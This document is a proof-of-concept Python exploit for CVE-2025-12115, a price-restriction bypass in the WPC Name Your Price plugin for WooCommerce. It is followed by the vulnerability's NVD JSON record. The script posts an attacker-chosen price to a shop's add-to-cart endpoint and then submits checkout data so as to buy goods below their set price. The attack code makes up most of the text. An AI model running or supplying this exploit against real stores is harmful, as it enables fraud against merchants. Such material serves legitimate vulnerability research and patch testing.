CVE-2025-12115

# CVE-2025-12115 PoC - WPC Name Your Price Bypass # Description: Bypass price restriction to purchase products at lower prices import requests import json TARGET_URL = "https://vulnerable-site.com" PRODUCT_ID = 123 # Replace with actual product ID NORMAL_PRICE = 99.99 ATTACKER_PRICE = 1.00 def exploit_cve_2025_12115(): """ This PoC demonstrates how an attacker can bypass the 'Name Your Price' restriction on WooCommerce products that have this feature disabled. """ session = requests.Session() # Step 1: Get product page to obtain nonce and session cookies product_url = f"{TARGET_URL}/?p={PRODUCT_ID}" response = session.get(product_url) # Step 2: Extract CSRF token from the page # In real attack, attacker would use browser dev tools or extract from HTML # Step 3: Craft malicious request to add item to cart with custom price # The vulnerability allows setting any price regardless of product settings cart_url = f"{TARGET_URL}/?wc-ajax=add_to_cart" payload = { "product_id": PRODUCT_ID, "quantity": 1, "price": ATTACKER_PRICE, # Attacker-controlled price "wpc_name_your_price": ATTACKER_PRICE # Plugin-specific parameter } response = session.post(cart_url, data=payload) # Step 4: Checkout with manipulated price checkout_url = f"{TARGET_URL}/checkout/" checkout_data = { "billing_first_name": "Attacker", "billing_last_name": "User", "billing_email": "[email protected]", "total": ATTACKER_PRICE } response = session.post(checkout_url, data=checkout_data) print(f"[!] Exploit sent with price: ${ATTACKER_PRICE}") print(f"[*] Expected price: ${NORMAL_PRICE}") print(f"[*] Potential loss: ${NORMAL_PRICE - ATTACKER_PRICE} per item") return response.status_code == 200 if __name__ == "__main__": exploit_cve_2025_12115()

{"cve": {"id": "CVE-2025-12115", "sourceIdentifier": "[email protected]", "published": "2025-10-31T10:15:49.990", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WPC Name Your Price for WooCommerce plugin for WordPress is vulnerable to unauthorized price alteration in all versions up to, and including, 2.1.9. This is due to the plugin not disabling the ability to name a custom price when it has been specifically disabled for a product. This makes it possible for unauthenticated attackers to purchase products at prices less than they should be able to."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-602"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3386310%40wpc-name-your-price&new=3386310%40wpc-name-your-price&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f64bc3c4-da89-4470-8353-d490f8bec408?source=cve", "source": "[email protected]"}]}}